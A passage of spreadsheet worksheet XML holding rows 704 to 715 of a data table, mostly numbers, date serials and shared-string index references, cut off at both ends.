        <v>0</v>
      </c>
      <c r="AW704">
        <v>5</v>
      </c>
      <c r="AX704">
        <v>5</v>
      </c>
      <c r="AY704">
        <v>3</v>
      </c>
      <c r="AZ704">
        <v>523</v>
      </c>
      <c r="BA704" t="s">
        <v>17209</v>
      </c>
      <c r="BB704">
        <v>0</v>
      </c>
      <c r="BC704" t="s">
        <v>10488</v>
      </c>
      <c r="BD704" t="s">
        <v>11019</v>
      </c>
    </row>
    <row r="705" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A705">
        <v>2284</v>
      </c>
      <c r="B705" t="s">
        <v>5536</v>
      </c>
      <c r="C705" t="s">
        <v>318</v>
      </c>
      <c r="D705" t="s">
        <v>5537</v>
      </c>
      <c r="E705" t="s">
        <v>49</v>
      </c>
      <c r="F705" t="s">
        <v>5434</v>
      </c>
      <c r="G705" s="1">
        <v>43885</v>
      </c>
      <c r="H705">
        <v>1935</v>
      </c>
      <c r="I705">
        <v>1935</v>
      </c>
      <c r="J705">
        <v>0</v>
      </c>
      <c r="K705">
        <v>0</v>
      </c>
      <c r="L705">
        <v>0</v>
      </c>
      <c r="M705">
        <v>0</v>
      </c>
      <c r="N705">
        <v>0</v>
      </c>
      <c r="O705">
        <v>0</v>
      </c>
      <c r="P705">
        <v>0</v>
      </c>
      <c r="Q705">
        <v>1</v>
      </c>
      <c r="R705">
        <v>0</v>
      </c>
      <c r="S705">
        <v>0</v>
      </c>
      <c r="T705">
        <v>1</v>
      </c>
      <c r="U705">
        <v>0</v>
      </c>
      <c r="V705">
        <v>0</v>
      </c>
      <c r="W705">
        <v>0</v>
      </c>
      <c r="X705">
        <v>0</v>
      </c>
      <c r="Y705">
        <v>0</v>
      </c>
      <c r="Z705">
        <v>0</v>
      </c>
      <c r="AA705">
        <v>0</v>
      </c>
      <c r="AB705">
        <v>60</v>
      </c>
      <c r="AC705">
        <v>0</v>
      </c>
      <c r="AD705">
        <v>0</v>
      </c>
      <c r="AE705">
        <v>500</v>
      </c>
      <c r="AF705" t="s">
        <v>5538</v>
      </c>
      <c r="AG705">
        <v>90513</v>
      </c>
      <c r="AH705">
        <v>26</v>
      </c>
      <c r="AJ705">
        <v>406</v>
      </c>
      <c r="AK705" t="s">
        <v>647</v>
      </c>
      <c r="AL705" t="s">
        <v>648</v>
      </c>
      <c r="AM705" t="s">
        <v>5539</v>
      </c>
      <c r="AN705" t="s">
        <v>288</v>
      </c>
      <c r="AO705">
        <v>2015</v>
      </c>
      <c r="AP705">
        <v>82155827111</v>
      </c>
      <c r="AQ705" t="s">
        <v>5540</v>
      </c>
      <c r="AR705" t="s">
        <v>5538</v>
      </c>
      <c r="AS705" t="s">
        <v>57</v>
      </c>
      <c r="AT705" t="s">
        <v>58</v>
      </c>
      <c r="AU705">
        <v>26</v>
      </c>
      <c r="AV705">
        <v>0</v>
      </c>
      <c r="AW705">
        <v>0</v>
      </c>
      <c r="AX705">
        <v>0</v>
      </c>
      <c r="AY705">
        <v>5</v>
      </c>
      <c r="AZ705">
        <v>0</v>
      </c>
      <c r="BA705" t="s">
        <v>17116</v>
      </c>
      <c r="BB705" t="s">
        <v>15806</v>
      </c>
      <c r="BC705" t="s">
        <v>10323</v>
      </c>
      <c r="BD705" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="706" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A706">
        <v>2607</v>
      </c>
      <c r="B706" t="s">
        <v>4180</v>
      </c>
      <c r="C706" t="s">
        <v>318</v>
      </c>
      <c r="D706" t="s">
        <v>5541</v>
      </c>
      <c r="E706" t="s">
        <v>49</v>
      </c>
      <c r="F706" t="s">
        <v>364</v>
      </c>
      <c r="G706" s="1">
        <v>43899</v>
      </c>
      <c r="H706">
        <v>1952</v>
      </c>
      <c r="I706">
        <v>1952</v>
      </c>
      <c r="J706">
        <v>0</v>
      </c>
      <c r="K706">
        <v>0</v>
      </c>
      <c r="L706">
        <v>0</v>
      </c>
      <c r="M706">
        <v>0</v>
      </c>
      <c r="N706">
        <v>0</v>
      </c>
      <c r="O706">
        <v>0</v>
      </c>
      <c r="P706">
        <v>0</v>
      </c>
      <c r="Q706">
        <v>0</v>
      </c>
      <c r="R706">
        <v>0</v>
      </c>
      <c r="S706">
        <v>0</v>
      </c>
      <c r="T706">
        <v>1</v>
      </c>
      <c r="U706">
        <v>0</v>
      </c>
      <c r="V706">
        <v>0</v>
      </c>
      <c r="W706">
        <v>0</v>
      </c>
      <c r="X706">
        <v>0</v>
      </c>
      <c r="Y706">
        <v>0</v>
      </c>
      <c r="Z706">
        <v>0</v>
      </c>
      <c r="AA706">
        <v>0</v>
      </c>
      <c r="AB706">
        <v>0</v>
      </c>
      <c r="AC706">
        <v>0</v>
      </c>
      <c r="AD706">
        <v>0</v>
      </c>
      <c r="AE706">
        <v>10000</v>
      </c>
      <c r="AF706" t="s">
        <v>5542</v>
      </c>
      <c r="AG706">
        <v>90551</v>
      </c>
      <c r="AH706">
        <v>26</v>
      </c>
      <c r="AJ706">
        <v>406</v>
      </c>
      <c r="AK706" t="s">
        <v>647</v>
      </c>
      <c r="AL706" t="s">
        <v>2918</v>
      </c>
      <c r="AM706" t="s">
        <v>5543</v>
      </c>
      <c r="AN706" t="s">
        <v>55</v>
      </c>
      <c r="AO706">
        <v>2010</v>
      </c>
      <c r="AP706">
        <v>85256250410</v>
      </c>
      <c r="AQ706" t="s">
        <v>5544</v>
      </c>
      <c r="AR706" t="s">
        <v>5542</v>
      </c>
      <c r="AS706" t="s">
        <v>371</v>
      </c>
      <c r="AT706" t="s">
        <v>58</v>
      </c>
      <c r="AU706">
        <v>26</v>
      </c>
      <c r="AV706">
        <v>0</v>
      </c>
      <c r="AW706">
        <v>10</v>
      </c>
      <c r="AX706">
        <v>0</v>
      </c>
      <c r="AY706">
        <v>16</v>
      </c>
      <c r="AZ706">
        <v>6</v>
      </c>
      <c r="BA706" t="s">
        <v>16885</v>
      </c>
      <c r="BB706" t="s">
        <v>17206</v>
      </c>
      <c r="BC706" t="s">
        <v>9506</v>
      </c>
      <c r="BD706" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="707" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A707">
        <v>2660</v>
      </c>
      <c r="B707" t="s">
        <v>5545</v>
      </c>
      <c r="C707" t="s">
        <v>157</v>
      </c>
      <c r="D707" t="s">
        <v>5546</v>
      </c>
      <c r="E707" t="s">
        <v>49</v>
      </c>
      <c r="F707" t="s">
        <v>364</v>
      </c>
      <c r="G707" s="1">
        <v>43900</v>
      </c>
      <c r="H707">
        <v>1961</v>
      </c>
      <c r="I707">
        <v>1961</v>
      </c>
      <c r="J707">
        <v>0</v>
      </c>
      <c r="K707">
        <v>0</v>
      </c>
      <c r="L707">
        <v>0</v>
      </c>
      <c r="M707">
        <v>0</v>
      </c>
      <c r="N707">
        <v>0</v>
      </c>
      <c r="O707">
        <v>0</v>
      </c>
      <c r="P707">
        <v>0</v>
      </c>
      <c r="Q707">
        <v>0</v>
      </c>
      <c r="R707">
        <v>0</v>
      </c>
      <c r="S707">
        <v>0</v>
      </c>
      <c r="T707">
        <v>1</v>
      </c>
      <c r="U707">
        <v>0</v>
      </c>
      <c r="V707">
        <v>0</v>
      </c>
      <c r="W707">
        <v>0</v>
      </c>
      <c r="X707">
        <v>0</v>
      </c>
      <c r="Y707">
        <v>0</v>
      </c>
      <c r="Z707">
        <v>0</v>
      </c>
      <c r="AA707">
        <v>0</v>
      </c>
      <c r="AB707">
        <v>0</v>
      </c>
      <c r="AC707">
        <v>0</v>
      </c>
      <c r="AD707">
        <v>0</v>
      </c>
      <c r="AE707">
        <v>120000</v>
      </c>
      <c r="AF707" t="s">
        <v>5547</v>
      </c>
      <c r="AG707">
        <v>61174</v>
      </c>
      <c r="AH707">
        <v>16</v>
      </c>
      <c r="AJ707">
        <v>252</v>
      </c>
      <c r="AK707" t="s">
        <v>4855</v>
      </c>
      <c r="AL707" t="s">
        <v>5548</v>
      </c>
      <c r="AM707" t="s">
        <v>5549</v>
      </c>
      <c r="AN707" t="s">
        <v>68</v>
      </c>
      <c r="AO707">
        <v>2020</v>
      </c>
      <c r="AP707">
        <v>81332821988</v>
      </c>
      <c r="AQ707" t="s">
        <v>5550</v>
      </c>
      <c r="AR707" t="s">
        <v>5547</v>
      </c>
      <c r="AU707">
        <v>26</v>
      </c>
      <c r="AV707">
        <v>0</v>
      </c>
      <c r="AW707">
        <v>2</v>
      </c>
      <c r="AX707">
        <v>3</v>
      </c>
      <c r="AY707">
        <v>0</v>
      </c>
      <c r="AZ707">
        <v>1</v>
      </c>
      <c r="BA707" t="s">
        <v>17249</v>
      </c>
      <c r="BB707">
        <v>0</v>
      </c>
      <c r="BC707">
        <v>0</v>
      </c>
      <c r="BD707" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="708" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A708">
        <v>2601</v>
      </c>
      <c r="B708" t="s">
        <v>5551</v>
      </c>
      <c r="C708" t="s">
        <v>579</v>
      </c>
      <c r="D708" t="s">
        <v>5552</v>
      </c>
      <c r="E708" t="s">
        <v>5553</v>
      </c>
      <c r="F708" t="s">
        <v>5554</v>
      </c>
      <c r="G708" s="1">
        <v>44088</v>
      </c>
      <c r="H708">
        <v>1976</v>
      </c>
      <c r="I708">
        <v>1976</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t="s">
        <v>5555</v>
      </c>
      <c r="AG708">
        <v>75123</v>
      </c>
      <c r="AH708">
        <v>23</v>
      </c>
      <c r="AJ708">
        <v>364</v>
      </c>
      <c r="AK708" t="s">
        <v>1278</v>
      </c>
      <c r="AL708" t="s">
        <v>5556</v>
      </c>
      <c r="AM708" t="s">
        <v>5557</v>
      </c>
      <c r="AN708" t="s">
        <v>68</v>
      </c>
      <c r="AO708">
        <v>2019</v>
      </c>
      <c r="AP708">
        <v>813921110442</v>
      </c>
      <c r="AQ708" t="s">
        <v>5558</v>
      </c>
      <c r="AR708" t="s">
        <v>5555</v>
      </c>
      <c r="AS708" t="s">
        <v>71</v>
      </c>
      <c r="AT708" t="s">
        <v>72</v>
      </c>
      <c r="AU708">
        <v>6</v>
      </c>
      <c r="AV708">
        <v>1</v>
      </c>
      <c r="AW708">
        <v>0</v>
      </c>
      <c r="AX708">
        <v>1</v>
      </c>
      <c r="AY708">
        <v>1</v>
      </c>
      <c r="AZ708">
        <v>4</v>
      </c>
      <c r="BA708" t="s">
        <v>17203</v>
      </c>
      <c r="BB708" t="s">
        <v>17214</v>
      </c>
      <c r="BC708" t="s">
        <v>10241</v>
      </c>
      <c r="BD708">
        <v>0</v>
      </c>
    </row>
    <row r="709" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A709">
        <v>2310</v>
      </c>
      <c r="B709" t="s">
        <v>5559</v>
      </c>
      <c r="C709" t="s">
        <v>5506</v>
      </c>
      <c r="D709" t="s">
        <v>5560</v>
      </c>
      <c r="E709" t="s">
        <v>142</v>
      </c>
      <c r="F709" t="s">
        <v>1746</v>
      </c>
      <c r="G709" s="1">
        <v>43959</v>
      </c>
      <c r="H709">
        <v>1986</v>
      </c>
      <c r="I709">
        <v>1986</v>
      </c>
      <c r="J709">
        <v>10</v>
      </c>
      <c r="K709">
        <v>4</v>
      </c>
      <c r="L709">
        <v>0</v>
      </c>
      <c r="M709">
        <v>0</v>
      </c>
      <c r="N709">
        <v>0</v>
      </c>
      <c r="O709">
        <v>0</v>
      </c>
      <c r="P709">
        <v>0</v>
      </c>
      <c r="Q709">
        <v>3</v>
      </c>
      <c r="R709">
        <v>9</v>
      </c>
      <c r="S709">
        <v>0</v>
      </c>
      <c r="T709">
        <v>0</v>
      </c>
      <c r="U709">
        <v>7</v>
      </c>
      <c r="V709">
        <v>200</v>
      </c>
      <c r="W709">
        <v>0</v>
      </c>
      <c r="X709">
        <v>0</v>
      </c>
      <c r="Y709">
        <v>0</v>
      </c>
      <c r="Z709">
        <v>0</v>
      </c>
      <c r="AA709">
        <v>0</v>
      </c>
      <c r="AB709">
        <v>300</v>
      </c>
      <c r="AC709">
        <v>700</v>
      </c>
      <c r="AD709">
        <v>0</v>
      </c>
      <c r="AE709">
        <v>0</v>
      </c>
      <c r="AF709" t="s">
        <v>5561</v>
      </c>
      <c r="AG709">
        <v>85362</v>
      </c>
      <c r="AH709">
        <v>19</v>
      </c>
      <c r="AJ709">
        <v>295</v>
      </c>
      <c r="AK709" t="s">
        <v>5562</v>
      </c>
      <c r="AL709" t="s">
        <v>5563</v>
      </c>
      <c r="AM709" t="s">
        <v>5564</v>
      </c>
      <c r="AN709" t="s">
        <v>55</v>
      </c>
      <c r="AO709">
        <v>2014</v>
      </c>
      <c r="AP709">
        <v>82145415555</v>
      </c>
      <c r="AQ709">
        <v>82145415555</v>
      </c>
      <c r="AR709" t="s">
        <v>5561</v>
      </c>
      <c r="AS709" t="s">
        <v>71</v>
      </c>
      <c r="AT709" t="s">
        <v>58</v>
      </c>
      <c r="AU709">
        <v>6</v>
      </c>
      <c r="AV709">
        <v>1</v>
      </c>
      <c r="AW709">
        <v>0</v>
      </c>
      <c r="AX709">
        <v>0</v>
      </c>
      <c r="AY709">
        <v>9</v>
      </c>
      <c r="AZ709">
        <v>6</v>
      </c>
      <c r="BA709" t="s">
        <v>17128</v>
      </c>
      <c r="BB709" t="s">
        <v>15823</v>
      </c>
      <c r="BC709">
        <v>0</v>
      </c>
      <c r="BD709" t="s">
        <v>10469</v>
      </c>
    </row>
    <row r="710" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A710">
        <v>2576</v>
      </c>
      <c r="B710" t="s">
        <v>5565</v>
      </c>
      <c r="C710" t="s">
        <v>607</v>
      </c>
      <c r="D710" t="s">
        <v>5566</v>
      </c>
      <c r="E710" t="s">
        <v>49</v>
      </c>
      <c r="F710" t="s">
        <v>364</v>
      </c>
      <c r="G710" s="1">
        <v>43957</v>
      </c>
      <c r="H710">
        <v>1996</v>
      </c>
      <c r="I710">
        <v>1996</v>
      </c>
      <c r="J710">
        <v>1</v>
      </c>
      <c r="K710">
        <v>0</v>
      </c>
      <c r="L710">
        <v>0</v>
      </c>
      <c r="M710">
        <v>0</v>
      </c>
      <c r="N710">
        <v>0</v>
      </c>
      <c r="O710">
        <v>0</v>
      </c>
      <c r="P710">
        <v>0</v>
      </c>
      <c r="Q710">
        <v>0</v>
      </c>
      <c r="R710">
        <v>0</v>
      </c>
      <c r="S710">
        <v>0</v>
      </c>
      <c r="T710">
        <v>1</v>
      </c>
      <c r="U710">
        <v>50000</v>
      </c>
      <c r="V710">
        <v>0</v>
      </c>
      <c r="W710">
        <v>0</v>
      </c>
      <c r="X710">
        <v>0</v>
      </c>
      <c r="Y710">
        <v>0</v>
      </c>
      <c r="Z710">
        <v>0</v>
      </c>
      <c r="AA710">
        <v>0</v>
      </c>
      <c r="AB710">
        <v>0</v>
      </c>
      <c r="AC710">
        <v>0</v>
      </c>
      <c r="AD710">
        <v>0</v>
      </c>
      <c r="AE710">
        <v>50000</v>
      </c>
      <c r="AF710" t="s">
        <v>5567</v>
      </c>
      <c r="AG710">
        <v>77125</v>
      </c>
      <c r="AH710">
        <v>24</v>
      </c>
      <c r="AJ710">
        <v>370</v>
      </c>
      <c r="AK710" t="s">
        <v>675</v>
      </c>
      <c r="AL710" t="s">
        <v>5568</v>
      </c>
      <c r="AM710" t="s">
        <v>5569</v>
      </c>
      <c r="AN710" t="s">
        <v>55</v>
      </c>
      <c r="AO710">
        <v>2020</v>
      </c>
      <c r="AP710">
        <v>85233046210</v>
      </c>
      <c r="AQ710" t="s">
        <v>5570</v>
      </c>
      <c r="AR710" t="s">
        <v>5567</v>
      </c>
      <c r="AS710" t="s">
        <v>371</v>
      </c>
      <c r="AT710" t="s">
        <v>58</v>
      </c>
      <c r="AU710">
        <v>28</v>
      </c>
      <c r="AV710">
        <v>0</v>
      </c>
      <c r="AW710">
        <v>0</v>
      </c>
      <c r="AX710">
        <v>0</v>
      </c>
      <c r="AY710">
        <v>23</v>
      </c>
      <c r="AZ710">
        <v>2</v>
      </c>
      <c r="BA710" t="s">
        <v>17186</v>
      </c>
      <c r="BB710">
        <v>0</v>
      </c>
      <c r="BC710" t="s">
        <v>10386</v>
      </c>
      <c r="BD710" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="711" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A711">
        <v>2317</v>
      </c>
      <c r="B711" t="s">
        <v>5571</v>
      </c>
      <c r="C711" t="s">
        <v>318</v>
      </c>
      <c r="D711" t="s">
        <v>5572</v>
      </c>
      <c r="E711" t="s">
        <v>412</v>
      </c>
      <c r="F711" t="s">
        <v>5573</v>
      </c>
      <c r="G711" s="1">
        <v>44299</v>
      </c>
      <c r="H711">
        <v>2007</v>
      </c>
      <c r="I711">
        <v>2007</v>
      </c>
      <c r="J711">
        <v>1</v>
      </c>
      <c r="K711">
        <v>0</v>
      </c>
      <c r="L711">
        <v>2</v>
      </c>
      <c r="M711">
        <v>1</v>
      </c>
      <c r="N711">
        <v>0</v>
      </c>
      <c r="O711">
        <v>0</v>
      </c>
      <c r="P711">
        <v>0</v>
      </c>
      <c r="Q711">
        <v>7</v>
      </c>
      <c r="R711">
        <v>21</v>
      </c>
      <c r="S711">
        <v>0</v>
      </c>
      <c r="T711">
        <v>1</v>
      </c>
      <c r="U711">
        <v>100</v>
      </c>
      <c r="V711">
        <v>0</v>
      </c>
      <c r="W711">
        <v>7000</v>
      </c>
      <c r="X711">
        <v>15000</v>
      </c>
      <c r="Y711">
        <v>0</v>
      </c>
      <c r="Z711">
        <v>0</v>
      </c>
      <c r="AA711">
        <v>0</v>
      </c>
      <c r="AB711">
        <v>1000</v>
      </c>
      <c r="AC711">
        <v>15</v>
      </c>
      <c r="AD711">
        <v>0</v>
      </c>
      <c r="AE711">
        <v>10</v>
      </c>
      <c r="AF711" t="s">
        <v>5574</v>
      </c>
      <c r="AG711">
        <v>90242</v>
      </c>
      <c r="AH711">
        <v>26</v>
      </c>
      <c r="AJ711">
        <v>420</v>
      </c>
      <c r="AK711" t="s">
        <v>331</v>
      </c>
      <c r="AL711" t="s">
        <v>332</v>
      </c>
      <c r="AM711" t="s">
        <v>5575</v>
      </c>
      <c r="AN711" t="s">
        <v>55</v>
      </c>
      <c r="AO711">
        <v>2011</v>
      </c>
      <c r="AP711" t="s">
        <v>5576</v>
      </c>
      <c r="AQ711" t="s">
        <v>5577</v>
      </c>
      <c r="AR711" t="s">
        <v>5578</v>
      </c>
      <c r="AS711" t="s">
        <v>71</v>
      </c>
      <c r="AT711" t="s">
        <v>58</v>
      </c>
      <c r="AU711">
        <v>25</v>
      </c>
      <c r="AV711">
        <v>1</v>
      </c>
      <c r="AW711">
        <v>12</v>
      </c>
      <c r="AX711">
        <v>50</v>
      </c>
      <c r="AY711">
        <v>1</v>
      </c>
      <c r="AZ711">
        <v>6</v>
      </c>
      <c r="BA711" t="s">
        <v>17131</v>
      </c>
      <c r="BB711" t="s">
        <v>15827</v>
      </c>
      <c r="BC711">
        <v>0</v>
      </c>
      <c r="BD711" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="712" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A712">
        <v>2308</v>
      </c>
      <c r="B712" t="s">
        <v>5579</v>
      </c>
      <c r="C712" t="s">
        <v>477</v>
      </c>
      <c r="D712" t="s">
        <v>5580</v>
      </c>
      <c r="E712" t="s">
        <v>5581</v>
      </c>
      <c r="F712" t="s">
        <v>5582</v>
      </c>
      <c r="G712" s="1">
        <v>43858</v>
      </c>
      <c r="H712">
        <v>2027</v>
      </c>
      <c r="I712">
        <v>2027</v>
      </c>
      <c r="J712">
        <v>4</v>
      </c>
      <c r="K712">
        <v>3</v>
      </c>
      <c r="L712">
        <v>2</v>
      </c>
      <c r="M712">
        <v>0</v>
      </c>
      <c r="N712">
        <v>0</v>
      </c>
      <c r="O712">
        <v>0</v>
      </c>
      <c r="P712">
        <v>0</v>
      </c>
      <c r="Q712">
        <v>0</v>
      </c>
      <c r="R712">
        <v>0</v>
      </c>
      <c r="S712">
        <v>0</v>
      </c>
      <c r="T712">
        <v>0</v>
      </c>
      <c r="U712">
        <v>64000</v>
      </c>
      <c r="V712">
        <v>100000</v>
      </c>
      <c r="W712">
        <v>80000</v>
      </c>
      <c r="X712">
        <v>0</v>
      </c>
      <c r="Y712">
        <v>0</v>
      </c>
      <c r="Z712">
        <v>0</v>
      </c>
      <c r="AA712">
        <v>0</v>
      </c>
      <c r="AB712">
        <v>0</v>
      </c>
      <c r="AC712">
        <v>0</v>
      </c>
      <c r="AD712">
        <v>0</v>
      </c>
      <c r="AE712">
        <v>0</v>
      </c>
      <c r="AF712" t="s">
        <v>5583</v>
      </c>
      <c r="AG712">
        <v>95526</v>
      </c>
      <c r="AH712">
        <v>29</v>
      </c>
      <c r="AJ712">
        <v>383</v>
      </c>
      <c r="AK712" t="s">
        <v>2986</v>
      </c>
      <c r="AL712" t="s">
        <v>3596</v>
      </c>
      <c r="AM712" t="s">
        <v>5584</v>
      </c>
      <c r="AN712" t="s">
        <v>55</v>
      </c>
      <c r="AO712">
        <v>2000</v>
      </c>
      <c r="AP712" t="s">
        <v>5585</v>
      </c>
      <c r="AQ712" t="s">
        <v>5586</v>
      </c>
      <c r="AR712" t="s">
        <v>5587</v>
      </c>
      <c r="AS712" t="s">
        <v>71</v>
      </c>
      <c r="AT712" t="s">
        <v>58</v>
      </c>
      <c r="AU712">
        <v>25</v>
      </c>
      <c r="AV712">
        <v>2</v>
      </c>
      <c r="AW712">
        <v>20</v>
      </c>
      <c r="AX712">
        <v>10</v>
      </c>
      <c r="AY712">
        <v>50</v>
      </c>
      <c r="AZ712">
        <v>6</v>
      </c>
      <c r="BA712" t="s">
        <v>17126</v>
      </c>
      <c r="BB712" t="s">
        <v>15821</v>
      </c>
      <c r="BC712">
        <v>0</v>
      </c>
      <c r="BD712" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="713" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A713">
        <v>2669</v>
      </c>
      <c r="B713" t="s">
        <v>5588</v>
      </c>
      <c r="C713" t="s">
        <v>99</v>
      </c>
      <c r="D713" t="s">
        <v>5589</v>
      </c>
      <c r="E713" t="s">
        <v>111</v>
      </c>
      <c r="F713" t="s">
        <v>5590</v>
      </c>
      <c r="G713" s="1">
        <v>43928</v>
      </c>
      <c r="H713">
        <v>2061</v>
      </c>
      <c r="I713">
        <v>2061</v>
      </c>
      <c r="J713">
        <v>2</v>
      </c>
      <c r="K713">
        <v>1</v>
      </c>
      <c r="L713">
        <v>2</v>
      </c>
      <c r="M713">
        <v>0</v>
      </c>
      <c r="N713">
        <v>0</v>
      </c>
      <c r="O713">
        <v>1</v>
      </c>
      <c r="P713">
        <v>0</v>
      </c>
      <c r="Q713">
        <v>2</v>
      </c>
      <c r="R713">
        <v>2</v>
      </c>
      <c r="S713">
        <v>0</v>
      </c>
      <c r="T713">
        <v>0</v>
      </c>
      <c r="U713">
        <v>1000000</v>
      </c>
      <c r="V713">
        <v>8000</v>
      </c>
      <c r="W713">
        <v>6000</v>
      </c>
      <c r="X713">
        <v>0</v>
      </c>
      <c r="Y713">
        <v>0</v>
      </c>
      <c r="Z713">
        <v>500</v>
      </c>
      <c r="AA713">
        <v>0</v>
      </c>
      <c r="AB713">
        <v>600</v>
      </c>
      <c r="AC713">
        <v>6000</v>
      </c>
      <c r="AD713">
        <v>0</v>
      </c>
      <c r="AE713">
        <v>0</v>
      </c>
      <c r="AF713" t="s">
        <v>5591</v>
      </c>
      <c r="AG713">
        <v>14440</v>
      </c>
      <c r="AH713">
        <v>12</v>
      </c>
      <c r="AJ713">
        <v>160</v>
      </c>
      <c r="AK713" t="s">
        <v>114</v>
      </c>
      <c r="AL713" t="s">
        <v>114</v>
      </c>
      <c r="AM713" t="s">
        <v>5592</v>
      </c>
      <c r="AN713" t="s">
        <v>55</v>
      </c>
      <c r="AO713">
        <v>2004</v>
      </c>
      <c r="AP713" t="s">
        <v>5593</v>
      </c>
      <c r="AQ713" t="s">
        <v>5594</v>
      </c>
      <c r="AR713" t="s">
        <v>5595</v>
      </c>
      <c r="AS713" t="s">
        <v>71</v>
      </c>
      <c r="AT713" t="s">
        <v>58</v>
      </c>
      <c r="AU713">
        <v>26</v>
      </c>
      <c r="AV713">
        <v>1</v>
      </c>
      <c r="AW713">
        <v>36</v>
      </c>
      <c r="AX713">
        <v>35</v>
      </c>
      <c r="AY713">
        <v>30</v>
      </c>
      <c r="AZ713">
        <v>37</v>
      </c>
      <c r="BA713" t="s">
        <v>16781</v>
      </c>
      <c r="BB713" t="s">
        <v>15893</v>
      </c>
      <c r="BC713" t="s">
        <v>10435</v>
      </c>
      <c r="BD713" t="s">
        <v>10436</v>
      </c>
    </row>
    <row r="714" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A714">
        <v>2661</v>
      </c>
      <c r="B714" t="s">
        <v>3761</v>
      </c>
      <c r="C714" t="s">
        <v>726</v>
      </c>
      <c r="D714" t="s">
        <v>5596</v>
      </c>
      <c r="E714" t="s">
        <v>111</v>
      </c>
      <c r="F714" t="s">
        <v>5597</v>
      </c>
      <c r="G714" s="1">
        <v>43908</v>
      </c>
      <c r="H714">
        <v>2063</v>
      </c>
      <c r="I714">
        <v>2063</v>
      </c>
      <c r="J714">
        <v>3</v>
      </c>
      <c r="K714">
        <v>1</v>
      </c>
      <c r="L714">
        <v>3</v>
      </c>
      <c r="M714">
        <v>0</v>
      </c>
      <c r="N714">
        <v>0</v>
      </c>
      <c r="O714">
        <v>0</v>
      </c>
      <c r="P714">
        <v>0</v>
      </c>
      <c r="Q714">
        <v>0</v>
      </c>
      <c r="R714">
        <v>3</v>
      </c>
      <c r="S714">
        <v>0</v>
      </c>
      <c r="T714">
        <v>0</v>
      </c>
      <c r="U714">
        <v>200000</v>
      </c>
      <c r="V714">
        <v>50000</v>
      </c>
      <c r="W714">
        <v>5500</v>
      </c>
      <c r="X714">
        <v>0</v>
      </c>
      <c r="Y714">
        <v>0</v>
      </c>
      <c r="Z714">
        <v>0</v>
      </c>
      <c r="AA714">
        <v>0</v>
      </c>
      <c r="AB714">
        <v>0</v>
      </c>
      <c r="AC714">
        <v>12000</v>
      </c>
      <c r="AD714">
        <v>0</v>
      </c>
      <c r="AE714">
        <v>0</v>
      </c>
      <c r="AF714" t="s">
        <v>5598</v>
      </c>
      <c r="AG714">
        <v>97771</v>
      </c>
      <c r="AH714">
        <v>32</v>
      </c>
      <c r="AJ714">
        <v>469</v>
      </c>
      <c r="AK714" t="s">
        <v>5599</v>
      </c>
      <c r="AL714" t="s">
        <v>5600</v>
      </c>
      <c r="AM714" t="s">
        <v>5601</v>
      </c>
      <c r="AN714" t="s">
        <v>55</v>
      </c>
      <c r="AO714">
        <v>2018</v>
      </c>
      <c r="AP714" t="s">
        <v>5602</v>
      </c>
      <c r="AQ714" t="s">
        <v>5603</v>
      </c>
      <c r="AR714" t="s">
        <v>5604</v>
      </c>
      <c r="AS714" t="s">
        <v>71</v>
      </c>
      <c r="AT714" t="s">
        <v>58</v>
      </c>
      <c r="AU714">
        <v>13</v>
      </c>
      <c r="AV714">
        <v>3</v>
      </c>
      <c r="AW714">
        <v>76</v>
      </c>
      <c r="AX714">
        <v>11</v>
      </c>
      <c r="AY714">
        <v>1</v>
      </c>
      <c r="AZ714">
        <v>0</v>
      </c>
      <c r="BA714" t="s">
        <v>16606</v>
      </c>
      <c r="BB714">
        <v>0</v>
      </c>
      <c r="BC714" t="s">
        <v>9693</v>
      </c>
      <c r="BD714" t="s">
        <v>10452</v>
      </c>
    </row>
    <row r="715" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A715">
        <v>2674</v>
      </c>
      <c r="B715" t="s">
        <v>5605</v>
      </c>
      <c r="C715" t="s">
        <v>99</v>
      </c>
      <c r="D715" t="s">
        <v>5606</v>
      </c>
      <c r="E715" t="s">
        <v>142</v>
      </c>
      <c r="F715" t="s">
        <v>1420</v>
      </c>
      <c r="G715" s="1">
        <v>44106</v>
      </c>
      <c r="H715">
        <v>2102</v>
      </c>
      <c r="I715">
        <v>2102</v>
      </c>
      <c r="J715">
        <v>0</v>
      </c>
      <c r="K715">
        <v>2</v>
      </c>
      <c r="L715">
        <v>0</v>
      </c>
      <c r="M715">
        <v>0</v>
      </c>
      <c r="N715">
        <v>0</v>
      </c>
      <c r="O715">
        <v>0</v>
      </c>
      <c r="P715">
        <v>0</v>
      </c>
      <c r="Q715">
        <v>0</v>
      </c>
      <c r="R715">
        <v>0</v>
      </c>
      <c r="S715">
        <v>0</v>
      </c>
      <c r="T715">
        <v>0</v>
      </c>
      <c r="U715">
        <v>0</v>
      </c>
      <c r="V715">
        <v>10000</v>
      </c>
      <c r="W715">
        <v>0</v>
      </c>
      <c r="X715">
        <v>0</v>
      </c>
      <c r="Y715">
        <v>0</v>
      </c>
      <c r="Z715">
        <v>0</v>
      </c>
      <c r="AA715">
        <v>0</v>
      </c>
      <c r="AB715">
        <v>0</v>
      </c>
      <c r="AC715">
        <v>0</v>
      </c>
      <c r="AD715">
        <v>0</v>
      </c>
      <c r="AE715">
        <v>0</v>
      </c>
      <c r="AF715" t="s">
        <v>5607</v>
      </c>
      <c r="AG715">
        <v>14130</v>
      </c>
      <c r="AH715">
        <v>12</v>
      </c>
      <c r="AJ715">
        <v>160</v>
      </c>
      <c r="AK715" t="s">
        <v>4501</v>
      </c>
      <c r="AL715" t="s">
        <v>5608</v>
      </c>
      <c r="AM715" t="s">
        <v>5609</v>
      </c>
      <c r="AN715" t="s">
        <v>68</v>
      </c>
      <c r="AO715">
        <v>2018</v>
      </c>
      <c r="AP715" t="s">
        <v>5610</v>
